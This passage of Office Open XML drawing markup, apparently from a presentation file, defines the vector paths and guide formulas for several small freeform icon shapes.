                  <a:gd name="T15" fmla="*/ 79 h 100"/>
                  <a:gd name="T16" fmla="*/ 36 w 107"/>
                  <a:gd name="T17" fmla="*/ 77 h 100"/>
                  <a:gd name="T18" fmla="*/ 45 w 107"/>
                  <a:gd name="T19" fmla="*/ 73 h 100"/>
                  <a:gd name="T20" fmla="*/ 47 w 107"/>
                  <a:gd name="T21" fmla="*/ 73 h 100"/>
                  <a:gd name="T22" fmla="*/ 53 w 107"/>
                  <a:gd name="T23" fmla="*/ 73 h 100"/>
                  <a:gd name="T24" fmla="*/ 70 w 107"/>
                  <a:gd name="T25" fmla="*/ 71 h 100"/>
                  <a:gd name="T26" fmla="*/ 83 w 107"/>
                  <a:gd name="T27" fmla="*/ 64 h 100"/>
                  <a:gd name="T28" fmla="*/ 93 w 107"/>
                  <a:gd name="T29" fmla="*/ 43 h 100"/>
                  <a:gd name="T30" fmla="*/ 83 w 107"/>
                  <a:gd name="T31" fmla="*/ 23 h 100"/>
                  <a:gd name="T32" fmla="*/ 70 w 107"/>
                  <a:gd name="T33" fmla="*/ 16 h 100"/>
                  <a:gd name="T34" fmla="*/ 53 w 107"/>
                  <a:gd name="T35" fmla="*/ 13 h 100"/>
                  <a:gd name="T36" fmla="*/ 53 w 107"/>
                  <a:gd name="T37" fmla="*/ 0 h 100"/>
                  <a:gd name="T38" fmla="*/ 53 w 107"/>
                  <a:gd name="T39" fmla="*/ 0 h 100"/>
                  <a:gd name="T40" fmla="*/ 107 w 107"/>
                  <a:gd name="T41" fmla="*/ 43 h 100"/>
                  <a:gd name="T42" fmla="*/ 53 w 107"/>
                  <a:gd name="T43" fmla="*/ 87 h 100"/>
                  <a:gd name="T44" fmla="*/ 45 w 107"/>
                  <a:gd name="T45" fmla="*/ 86 h 100"/>
                  <a:gd name="T46" fmla="*/ 7 w 107"/>
                  <a:gd name="T47" fmla="*/ 100 h 100"/>
                  <a:gd name="T48" fmla="*/ 7 w 107"/>
                  <a:gd name="T49" fmla="*/ 97 h 100"/>
                  <a:gd name="T50" fmla="*/ 20 w 107"/>
                  <a:gd name="T51" fmla="*/ 80 h 100"/>
                  <a:gd name="T52" fmla="*/ 20 w 107"/>
                  <a:gd name="T53" fmla="*/ 77 h 100"/>
                  <a:gd name="T54" fmla="*/ 0 w 107"/>
                  <a:gd name="T55" fmla="*/ 43 h 100"/>
                  <a:gd name="T56" fmla="*/ 53 w 107"/>
                  <a:gd name="T57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7" h="100">
                    <a:moveTo>
                      <a:pt x="53" y="13"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="13"/>
                      <a:pt x="42" y="14"/>
                      <a:pt x="37" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="18"/>
                      <a:pt x="28" y="20"/>
                      <a:pt x="24" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="29"/>
                      <a:pt x="13" y="36"/>
                      <a:pt x="13" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="48"/>
                      <a:pt x="14" y="52"/>
                      <a:pt x="17" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="59"/>
                      <a:pt x="23" y="63"/>
                      <a:pt x="27" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="68"/>
                      <a:pt x="32" y="71"/>
                      <a:pt x="33" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="76"/>
                      <a:pt x="33" y="78"/>
                      <a:pt x="33" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="78"/>
                      <a:pt x="35" y="78"/>
                      <a:pt x="36" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="74"/>
                      <a:pt x="42" y="73"/>
                      <a:pt x="45" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="73"/>
                      <a:pt x="46" y="73"/>
                      <a:pt x="47" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="73"/>
                      <a:pt x="51" y="73"/>
                      <a:pt x="53" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="73"/>
                      <a:pt x="65" y="73"/>
                      <a:pt x="70" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="69"/>
                      <a:pt x="79" y="67"/>
                      <a:pt x="83" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="58"/>
                      <a:pt x="93" y="51"/>
                      <a:pt x="93" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="36"/>
                      <a:pt x="90" y="29"/>
                      <a:pt x="83" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="20"/>
                      <a:pt x="75" y="18"/>
                      <a:pt x="70" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="14"/>
                      <a:pt x="59" y="13"/>
                      <a:pt x="53" y="13"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="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83" y="0"/>
                      <a:pt x="107" y="19"/>
                      <a:pt x="107" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="67"/>
                      <a:pt x="83" y="87"/>
                      <a:pt x="53" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="87"/>
                      <a:pt x="48" y="87"/>
                      <a:pt x="45" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="98"/>
                      <a:pt x="20" y="100"/>
                      <a:pt x="7" y="100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14" y="94"/>
                      <a:pt x="20" y="87"/>
                      <a:pt x="20" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="79"/>
                      <a:pt x="20" y="78"/>
                      <a:pt x="20" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="69"/>
                      <a:pt x="0" y="57"/>
                      <a:pt x="0" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="19"/>
                      <a:pt x="24" y="0"/>
                      <a:pt x="5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8" name="Freeform 56">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35D746B-9BB4-4F36-93A2-855DA12B4C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01612" y="4250944"/>
                <a:ext cx="215306" cy="215306"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 67"/>
                  <a:gd name="T1" fmla="*/ 17 h 67"/>
                  <a:gd name="T2" fmla="*/ 67 w 67"/>
                  <a:gd name="T3" fmla="*/ 13 h 67"/>
                  <a:gd name="T4" fmla="*/ 67 w 67"/>
                  <a:gd name="T5" fmla="*/ 5 h 67"/>
                  <a:gd name="T6" fmla="*/ 58 w 67"/>
                  <a:gd name="T7" fmla="*/ 5 h 67"/>
                  <a:gd name="T8" fmla="*/ 58 w 67"/>
                  <a:gd name="T9" fmla="*/ 0 h 67"/>
                  <a:gd name="T10" fmla="*/ 4 w 67"/>
                  <a:gd name="T11" fmla="*/ 0 h 67"/>
                  <a:gd name="T12" fmla="*/ 0 w 67"/>
                  <a:gd name="T13" fmla="*/ 5 h 67"/>
                  <a:gd name="T14" fmla="*/ 0 w 67"/>
                  <a:gd name="T15" fmla="*/ 63 h 67"/>
                  <a:gd name="T16" fmla="*/ 4 w 67"/>
                  <a:gd name="T17" fmla="*/ 67 h 67"/>
                  <a:gd name="T18" fmla="*/ 58 w 67"/>
                  <a:gd name="T19" fmla="*/ 67 h 67"/>
                  <a:gd name="T20" fmla="*/ 58 w 67"/>
                  <a:gd name="T21" fmla="*/ 50 h 67"/>
                  <a:gd name="T22" fmla="*/ 62 w 67"/>
                  <a:gd name="T23" fmla="*/ 50 h 67"/>
                  <a:gd name="T24" fmla="*/ 67 w 67"/>
                  <a:gd name="T25" fmla="*/ 46 h 67"/>
                  <a:gd name="T26" fmla="*/ 67 w 67"/>
                  <a:gd name="T27" fmla="*/ 38 h 67"/>
                  <a:gd name="T28" fmla="*/ 58 w 67"/>
                  <a:gd name="T29" fmla="*/ 38 h 67"/>
                  <a:gd name="T30" fmla="*/ 58 w 67"/>
                  <a:gd name="T31" fmla="*/ 34 h 67"/>
                  <a:gd name="T32" fmla="*/ 62 w 67"/>
                  <a:gd name="T33" fmla="*/ 34 h 67"/>
                  <a:gd name="T34" fmla="*/ 67 w 67"/>
                  <a:gd name="T35" fmla="*/ 30 h 67"/>
                  <a:gd name="T36" fmla="*/ 67 w 67"/>
                  <a:gd name="T37" fmla="*/ 21 h 67"/>
                  <a:gd name="T38" fmla="*/ 58 w 67"/>
                  <a:gd name="T39" fmla="*/ 21 h 67"/>
                  <a:gd name="T40" fmla="*/ 58 w 67"/>
                  <a:gd name="T41" fmla="*/ 17 h 67"/>
                  <a:gd name="T42" fmla="*/ 62 w 67"/>
                  <a:gd name="T43" fmla="*/ 17 h 67"/>
                  <a:gd name="T44" fmla="*/ 37 w 67"/>
                  <a:gd name="T45" fmla="*/ 17 h 67"/>
                  <a:gd name="T46" fmla="*/ 46 w 67"/>
                  <a:gd name="T47" fmla="*/ 25 h 67"/>
                  <a:gd name="T48" fmla="*/ 37 w 67"/>
                  <a:gd name="T49" fmla="*/ 34 h 67"/>
                  <a:gd name="T50" fmla="*/ 29 w 67"/>
                  <a:gd name="T51" fmla="*/ 25 h 67"/>
                  <a:gd name="T52" fmla="*/ 37 w 67"/>
                  <a:gd name="T53" fmla="*/ 17 h 67"/>
                  <a:gd name="T54" fmla="*/ 16 w 67"/>
                  <a:gd name="T55" fmla="*/ 63 h 67"/>
                  <a:gd name="T56" fmla="*/ 12 w 67"/>
                  <a:gd name="T57" fmla="*/ 63 h 67"/>
                  <a:gd name="T58" fmla="*/ 12 w 67"/>
                  <a:gd name="T59" fmla="*/ 5 h 67"/>
                  <a:gd name="T60" fmla="*/ 16 w 67"/>
                  <a:gd name="T61" fmla="*/ 5 h 67"/>
                  <a:gd name="T62" fmla="*/ 16 w 67"/>
                  <a:gd name="T63" fmla="*/ 63 h 67"/>
                  <a:gd name="T64" fmla="*/ 50 w 67"/>
                  <a:gd name="T65" fmla="*/ 50 h 67"/>
                  <a:gd name="T66" fmla="*/ 25 w 67"/>
                  <a:gd name="T67" fmla="*/ 50 h 67"/>
                  <a:gd name="T68" fmla="*/ 25 w 67"/>
                  <a:gd name="T69" fmla="*/ 46 h 67"/>
                  <a:gd name="T70" fmla="*/ 33 w 67"/>
                  <a:gd name="T71" fmla="*/ 38 h 67"/>
                  <a:gd name="T72" fmla="*/ 33 w 67"/>
                  <a:gd name="T73" fmla="*/ 38 h 67"/>
                  <a:gd name="T74" fmla="*/ 41 w 67"/>
                  <a:gd name="T75" fmla="*/ 38 h 67"/>
                  <a:gd name="T76" fmla="*/ 50 w 67"/>
                  <a:gd name="T77" fmla="*/ 46 h 67"/>
                  <a:gd name="T78" fmla="*/ 50 w 67"/>
                  <a:gd name="T79" fmla="*/ 5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7" h="67">
                    <a:moveTo>
                      <a:pt x="62" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="17"/>
                      <a:pt x="67" y="15"/>
                      <a:pt x="67" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="5"/>
                      <a:pt x="67" y="5"/>
                      <a:pt x="67" y="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2" y="67"/>
                      <a:pt x="4" y="67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5" y="50"/>
                      <a:pt x="67" y="49"/>
                      <a:pt x="67" y="46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58" y="38"/>
                      <a:pt x="58" y="38"/>
                      <a:pt x="58" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="34"/>
                      <a:pt x="58" y="34"/>
                      <a:pt x="58" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="34"/>
                      <a:pt x="62" y="34"/>
                      <a:pt x="62" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="34"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="67" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="21"/>
                      <a:pt x="67" y="21"/>
                      <a:pt x="67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17"/>
                      <a:pt x="58" y="17"/>
                      <a:pt x="58" y="17"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="62" y="17"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="37" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="17"/>
                      <a:pt x="46" y="21"/>
                      <a:pt x="46" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="30"/>
                      <a:pt x="42" y="34"/>
                      <a:pt x="37" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="34"/>
                      <a:pt x="29" y="30"/>
                      <a:pt x="29" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="21"/>
                      <a:pt x="33" y="17"/>
                      <a:pt x="37" y="17"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="16" y="63"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="63"/>
                      <a:pt x="12" y="63"/>
                      <a:pt x="12" y="63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lnTo>
                      <a:pt x="16" y="63"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="50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2"/>
                      <a:pt x="28" y="38"/>
                      <a:pt x="33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41" y="38"/>
                      <a:pt x="41" y="38"/>
                      <a:pt x="41" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="38"/>
                      <a:pt x="50" y="42"/>
                      <a:pt x="50" y="46"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="5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9" name="Freeform 57">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19A3DFE2-EC39-448B-8A06-9180FF7917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69589" y="3663746"/>
                <a:ext cx="185947" cy="182031"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 58 w 58"/>
                  <a:gd name="T1" fmla="*/ 29 h 57"/>
                  <a:gd name="T2" fmla="*/ 29 w 58"/>
                  <a:gd name="T3" fmla="*/ 57 h 57"/>
                  <a:gd name="T4" fmla="*/ 0 w 58"/>
                  <a:gd name="T5" fmla="*/ 29 h 57"/>
                  <a:gd name="T6" fmla="*/ 29 w 58"/>
                  <a:gd name="T7" fmla="*/ 0 h 57"/>
                  <a:gd name="T8" fmla="*/ 58 w 58"/>
                  <a:gd name="T9" fmla="*/ 29 h 57"/>
                  <a:gd name="T10" fmla="*/ 6 w 58"/>
                  <a:gd name="T11" fmla="*/ 29 h 57"/>
                  <a:gd name="T12" fmla="*/ 29 w 58"/>
                  <a:gd name="T13" fmla="*/ 52 h 57"/>
                  <a:gd name="T14" fmla="*/ 52 w 58"/>
                  <a:gd name="T15" fmla="*/ 29 h 57"/>
                  <a:gd name="T16" fmla="*/ 29 w 58"/>
                  <a:gd name="T17" fmla="*/ 6 h 57"/>
                  <a:gd name="T18" fmla="*/ 6 w 58"/>
                  <a:gd name="T19" fmla="*/ 29 h 57"/>
                  <a:gd name="T20" fmla="*/ 32 w 58"/>
                  <a:gd name="T21" fmla="*/ 12 h 57"/>
                  <a:gd name="T22" fmla="*/ 46 w 58"/>
                  <a:gd name="T23" fmla="*/ 26 h 57"/>
                  <a:gd name="T24" fmla="*/ 46 w 58"/>
                  <a:gd name="T25" fmla="*/ 31 h 57"/>
                  <a:gd name="T26" fmla="*/ 41 w 58"/>
                  <a:gd name="T27" fmla="*/ 31 h 57"/>
                  <a:gd name="T28" fmla="*/ 33 w 58"/>
                  <a:gd name="T29" fmla="*/ 23 h 57"/>
                  <a:gd name="T30" fmla="*/ 33 w 58"/>
                  <a:gd name="T31" fmla="*/ 43 h 57"/>
                  <a:gd name="T32" fmla="*/ 29 w 58"/>
                  <a:gd name="T33" fmla="*/ 47 h 57"/>
                  <a:gd name="T34" fmla="*/ 25 w 58"/>
                  <a:gd name="T35" fmla="*/ 43 h 57"/>
                  <a:gd name="T36" fmla="*/ 25 w 58"/>
                  <a:gd name="T37" fmla="*/ 23 h 57"/>
                  <a:gd name="T38" fmla="*/ 17 w 58"/>
                  <a:gd name="T39" fmla="*/ 31 h 57"/>
                  <a:gd name="T40" fmla="*/ 12 w 58"/>
                  <a:gd name="T41" fmla="*/ 31 h 57"/>
                  <a:gd name="T42" fmla="*/ 11 w 58"/>
                  <a:gd name="T43" fmla="*/ 29 h 57"/>
                  <a:gd name="T44" fmla="*/ 12 w 58"/>
                  <a:gd name="T45" fmla="*/ 26 h 57"/>
                  <a:gd name="T46" fmla="*/ 27 w 58"/>
                  <a:gd name="T47" fmla="*/ 12 h 57"/>
                  <a:gd name="T48" fmla="*/ 32 w 58"/>
                  <a:gd name="T49" fmla="*/ 1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57">
                    <a:moveTo>
                      <a:pt x="58" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="45"/>
                      <a:pt x="45" y="57"/>
                      <a:pt x="29" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="57"/>
                      <a:pt x="0" y="45"/>
                      <a:pt x="0" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="13"/>
                      <a:pt x="13" y="0"/>
                      <a:pt x="29" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="0"/>
                      <a:pt x="58" y="13"/>
                      <a:pt x="58" y="29"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="42"/>
                      <a:pt x="16" y="52"/>
                      <a:pt x="29" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="52"/>
                      <a:pt x="52" y="42"/>
                      <a:pt x="52" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="16"/>
                      <a:pt x="42" y="6"/>
                      <a:pt x="29" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="6"/>
                      <a:pt x="6" y="16"/>
                      <a:pt x="6" y="29"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="12"/>
                    </a:move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8"/>
                      <a:pt x="47" y="30"/>
                      <a:pt x="46" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="33"/>
                      <a:pt x="42" y="33"/>
                      <a:pt x="41" y="31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33" y="45"/>
                      <a:pt x="31" y="47"/>
                      <a:pt x="29" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="47"/>
                      <a:pt x="25" y="45"/>
                      <a:pt x="25" y="4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6" y="33"/>
                      <a:pt x="14" y="33"/>
                      <a:pt x="12" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="31"/>
                      <a:pt x="11" y="30"/>
                      <a:pt x="11" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="28"/>
                      <a:pt x="12" y="27"/>
                      <a:pt x="12" y="26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8" y="11"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="3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2" name="Freeform 58">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95EA14C6-EF85-400C-BC0B-7A357609F5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38272" y="3890796"/>
                <a:ext cx="146800" cy="146799"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 46"/>
                  <a:gd name="T1" fmla="*/ 0 h 46"/>
                  <a:gd name="T2" fmla="*/ 20 w 46"/>
                  <a:gd name="T3" fmla="*/ 0 h 46"/>
                  <a:gd name="T4" fmla="*/ 20 w 46"/>
                  <a:gd name="T5" fmla="*/ 3 h 46"/>
                  <a:gd name="T6" fmla="*/ 3 w 46"/>
                  <a:gd name="T7" fmla="*/ 3 h 46"/>
                  <a:gd name="T8" fmla="*/ 3 w 46"/>
                  <a:gd name="T9" fmla="*/ 0 h 46"/>
                  <a:gd name="T10" fmla="*/ 26 w 46"/>
                  <a:gd name="T11" fmla="*/ 0 h 46"/>
                  <a:gd name="T12" fmla="*/ 43 w 46"/>
                  <a:gd name="T13" fmla="*/ 0 h 46"/>
                  <a:gd name="T14" fmla="*/ 43 w 46"/>
                  <a:gd name="T15" fmla="*/ 3 h 46"/>
                  <a:gd name="T16" fmla="*/ 26 w 46"/>
                  <a:gd name="T17" fmla="*/ 3 h 46"/>
                  <a:gd name="T18" fmla="*/ 26 w 46"/>
                  <a:gd name="T19" fmla="*/ 0 h 46"/>
                  <a:gd name="T20" fmla="*/ 43 w 46"/>
                  <a:gd name="T21" fmla="*/ 14 h 46"/>
                  <a:gd name="T22" fmla="*/ 41 w 46"/>
                  <a:gd name="T23" fmla="*/ 14 h 46"/>
                  <a:gd name="T24" fmla="*/ 41 w 46"/>
                  <a:gd name="T25" fmla="*/ 3 h 46"/>
                  <a:gd name="T26" fmla="*/ 29 w 46"/>
                  <a:gd name="T27" fmla="*/ 3 h 46"/>
                  <a:gd name="T28" fmla="*/ 29 w 46"/>
                  <a:gd name="T29" fmla="*/ 14 h 46"/>
                  <a:gd name="T30" fmla="*/ 17 w 46"/>
                  <a:gd name="T31" fmla="*/ 14 h 46"/>
                  <a:gd name="T32" fmla="*/ 17 w 46"/>
                  <a:gd name="T33" fmla="*/ 3 h 46"/>
                  <a:gd name="T34" fmla="*/ 6 w 46"/>
                  <a:gd name="T35" fmla="*/ 3 h 46"/>
                  <a:gd name="T36" fmla="*/ 6 w 46"/>
                  <a:gd name="T37" fmla="*/ 14 h 46"/>
                  <a:gd name="T38" fmla="*/ 3 w 46"/>
                  <a:gd name="T39" fmla="*/ 14 h 46"/>
                  <a:gd name="T40" fmla="*/ 0 w 46"/>
                  <a:gd name="T41" fmla="*/ 18 h 46"/>
                  <a:gd name="T42" fmla="*/ 0 w 46"/>
                  <a:gd name="T43" fmla="*/ 43 h 46"/>
                  <a:gd name="T44" fmla="*/ 3 w 46"/>
                  <a:gd name="T45" fmla="*/ 46 h 46"/>
                  <a:gd name="T46" fmla="*/ 17 w 46"/>
                  <a:gd name="T47" fmla="*/ 46 h 46"/>
                  <a:gd name="T48" fmla="*/ 20 w 46"/>
                  <a:gd name="T49" fmla="*/ 43 h 46"/>
                  <a:gd name="T50" fmla="*/ 20 w 46"/>
                  <a:gd name="T51" fmla="*/ 26 h 46"/>
                  <a:gd name="T52" fmla="*/ 26 w 46"/>
                  <a:gd name="T53" fmla="*/ 26 h 46"/>
                  <a:gd name="T54" fmla="*/ 26 w 46"/>
                  <a:gd name="T55" fmla="*/ 43 h 46"/>
                  <a:gd name="T56" fmla="*/ 29 w 46"/>
                  <a:gd name="T57" fmla="*/ 46 h 46"/>
                  <a:gd name="T58" fmla="*/ 43 w 46"/>
                  <a:gd name="T59" fmla="*/ 46 h 46"/>
                  <a:gd name="T60" fmla="*/ 46 w 46"/>
                  <a:gd name="T61" fmla="*/ 43 h 46"/>
                  <a:gd name="T62" fmla="*/ 46 w 46"/>
                  <a:gd name="T63" fmla="*/ 18 h 46"/>
                  <a:gd name="T64" fmla="*/ 43 w 46"/>
                  <a:gd name="T65" fmla="*/ 14 h 46"/>
                  <a:gd name="T66" fmla="*/ 16 w 46"/>
                  <a:gd name="T67" fmla="*/ 43 h 46"/>
                  <a:gd name="T68" fmla="*/ 5 w 46"/>
                  <a:gd name="T69" fmla="*/ 43 h 46"/>
                  <a:gd name="T70" fmla="*/ 3 w 46"/>
                  <a:gd name="T71" fmla="*/ 42 h 46"/>
                  <a:gd name="T72" fmla="*/ 5 w 46"/>
                  <a:gd name="T73" fmla="*/ 40 h 46"/>
                  <a:gd name="T74" fmla="*/ 16 w 46"/>
                  <a:gd name="T75" fmla="*/ 40 h 46"/>
                  <a:gd name="T76" fmla="*/ 17 w 46"/>
                  <a:gd name="T77" fmla="*/ 42 h 46"/>
                  <a:gd name="T78" fmla="*/ 16 w 46"/>
                  <a:gd name="T79" fmla="*/ 43 h 46"/>
                  <a:gd name="T80" fmla="*/ 25 w 46"/>
                  <a:gd name="T81" fmla="*/ 23 h 46"/>
                  <a:gd name="T82" fmla="*/ 22 w 46"/>
                  <a:gd name="T83" fmla="*/ 23 h 46"/>
                  <a:gd name="T84" fmla="*/ 20 w 46"/>
                  <a:gd name="T85" fmla="*/ 22 h 46"/>
                  <a:gd name="T86" fmla="*/ 22 w 46"/>
                  <a:gd name="T87" fmla="*/ 20 h 46"/>
                  <a:gd name="T88" fmla="*/ 25 w 46"/>
                  <a:gd name="T89" fmla="*/ 20 h 46"/>
                  <a:gd name="T90" fmla="*/ 26 w 46"/>
                  <a:gd name="T91" fmla="*/ 22 h 46"/>
                  <a:gd name="T92" fmla="*/ 25 w 46"/>
                  <a:gd name="T93" fmla="*/ 23 h 46"/>
                  <a:gd name="T94" fmla="*/ 42 w 46"/>
                  <a:gd name="T95" fmla="*/ 43 h 46"/>
                  <a:gd name="T96" fmla="*/ 31 w 46"/>
                  <a:gd name="T97" fmla="*/ 43 h 46"/>
                  <a:gd name="T98" fmla="*/ 29 w 46"/>
                  <a:gd name="T99" fmla="*/ 42 h 46"/>
                  <a:gd name="T100" fmla="*/ 31 w 46"/>
                  <a:gd name="T101" fmla="*/ 40 h 46"/>
                  <a:gd name="T102" fmla="*/ 42 w 46"/>
                  <a:gd name="T103" fmla="*/ 40 h 46"/>
                  <a:gd name="T104" fmla="*/ 43 w 46"/>
                  <a:gd name="T105" fmla="*/ 42 h 46"/>
                  <a:gd name="T106" fmla="*/ 42 w 46"/>
                  <a:gd name="T107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6" h="46">
                    <a:moveTo>
                      <a:pt x="3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0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="26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26" y="3"/>
                      <a:pt x="26" y="3"/>
                      <a:pt x="26" y="3"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="14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0" y="16"/>
                      <a:pt x="0" y="18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5"/>
                      <a:pt x="2" y="46"/>
                      <a:pt x="3" y="46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19" y="46"/>
                      <a:pt x="20" y="45"/>
                      <a:pt x="20" y="43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5"/>
                      <a:pt x="28" y="46"/>
                      <a:pt x="29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5" y="46"/>
                      <a:pt x="46" y="45"/>
                      <a:pt x="46" y="43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6"/>
                      <a:pt x="45" y="14"/>
                      <a:pt x="43" y="14"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="16" y="43"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="43"/>
                      <a:pt x="5" y="43"/>
                      <a:pt x="5" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="43"/>
                      <a:pt x="3" y="43"/>
                      <a:pt x="3" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="41"/>
                      <a:pt x="4" y="40"/>
                      <a:pt x="5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0"/>
                      <a:pt x="17" y="41"/>
                      <a:pt x="17" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="43"/>
                      <a:pt x="17" y="43"/>
                      <a:pt x="16" y="43"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25" y="23"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="23"/>
                      <a:pt x="22" y="23"/>
                      <a:pt x="22" y="23"/>
                    </a:cubicBez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0"/>
                      <a:pt x="22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6" y="21"/>
                      <a:pt x="26" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="22"/>
                      <a:pt x="25" y="23"/>
                      <a:pt x="25" y="23"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="42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30" y="43"/>
                      <a:pt x="29" y="43"/>
                      <a:pt x="29" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="41"/>
                      <a:pt x="30" y="40"/>
                      <a:pt x="31" y="40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3" y="40"/>
                      <a:pt x="43" y="41"/>
                      <a:pt x="43" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="43"/>
                      <a:pt x="43" y="43"/>
